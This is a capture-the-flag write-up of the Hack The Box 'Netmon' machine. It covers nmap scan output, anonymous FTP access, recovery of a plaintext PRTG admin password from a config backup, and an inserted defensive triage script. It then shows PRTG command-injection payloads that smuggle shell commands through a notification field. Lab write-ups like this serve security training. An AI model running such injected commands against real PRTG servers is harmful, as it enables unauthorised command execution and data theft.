[Hack the box]Netmon-Windows-10.10.10.152

Start with an nmap scan:

root@kali:~# nmap -sV -sT -sC -T5 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-22 20:46 EDT
Warning: 10.10.10.152 giving up on port because retransmission cap hit (2).
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.98% done; ETC: 20:47 (0:00:00 remaining)
Nmap scan report for 10.10.10.152
Host is up (0.22s latency).
Not shown: 887 closed ports, 108 filtered ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-04-22 20:47:28
|_  start_date: 2019-04-22 20:31:55

Port 21 allows anonymous access:
ftp://10.10.10.152/Users/Public/user.txt

Port 80 runs the PRTG Network Monitor service.
Under c:\Windows\ there is a batch file, restart.bat:

net stop PRTGCoreService
copy "c:\Windows\PRTG Configuration.dat" "C:\ProgramData\Paessler\PRTG Network Monitor"
net start PRTGCoreService

That leads to the backup file PRTG Configuration.old.bak in the C:\ProgramData\Paessler\PRTG Network Monitor directory, which contains a plaintext username and password. Logging in with those credentials fails; PrTg@dmin2019 logs in successfully.


A quick Google search turns up the vulnerability: PRTG < 18.2.39 Command Injection Vulnerability.
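The scan output and the version threshold above give a defender enough to triage this host automatically. The following script is an added example, not part of the original write-up: it parses a constructed excerpt of the nmap report and flags the three exposures seen here (anonymous FTP, a PRTG build below 18.2.39, and SMB signing disabled); the 18.2.39 cut-off is taken from the write-up, and the remediation wording is my own.

```python
"""Triage an nmap service-scan report for the exposures seen on this host."""
import re

# Constructed excerpt of the nmap output quoted above (not the full scan).
SAMPLE_NMAP = """\
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_  message_signing: disabled (dangerous, but default)
"""

PRTG_FIXED = (18, 2, 39)  # first release without the command injection, per the write-up


def parse_version(text):
    """Turn a 'PRTG/18.1.37.13946' server header into a tuple of ints, or None."""
    m = re.search(r"PRTG/(\d+(?:\.\d+)+)", text)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None


def prtg_is_vulnerable(version):
    """Tuples compare lexicographically, so (18, 1, 37) < (18, 2, 39) is True."""
    return version is not None and version[:3] < PRTG_FIXED


def triage(report):
    """Return (port, finding) pairs that deserve remediation, in report order."""
    findings = []
    port = None
    for line in report.splitlines():
        m = re.match(r"^(\d+)/tcp\s+open", line)
        if m:
            port = int(m.group(1))  # subsequent script lines belong to this port
            continue
        if "Anonymous FTP login allowed" in line:
            findings.append((port, "anonymous FTP: disable it; config backups were readable here"))
        elif "http-server-header: PRTG/" in line:
            version = parse_version(line)
            if prtg_is_vulnerable(version):
                label = ".".join(map(str, version))
                findings.append((port, f"PRTG {label} < 18.2.39: upgrade (command injection)"))
        elif "message_signing: disabled" in line:
            findings.append((port, "SMB signing disabled: require signing via group policy"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(SAMPLE_NMAP):
        print(f"{port}/tcp  {finding}")
```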


First, list the directory structure:
test.txt;tree /f c:\Users\Administrator > c:\output.txt

Set the schedule to 6s so the notification fires quickly.

The file is written out successfully.

Next, read root.txt with the same approach:
test.txt;more c:\Users\Administrator\Desktop\root.txt > c:\output1.txt

Reference write-up
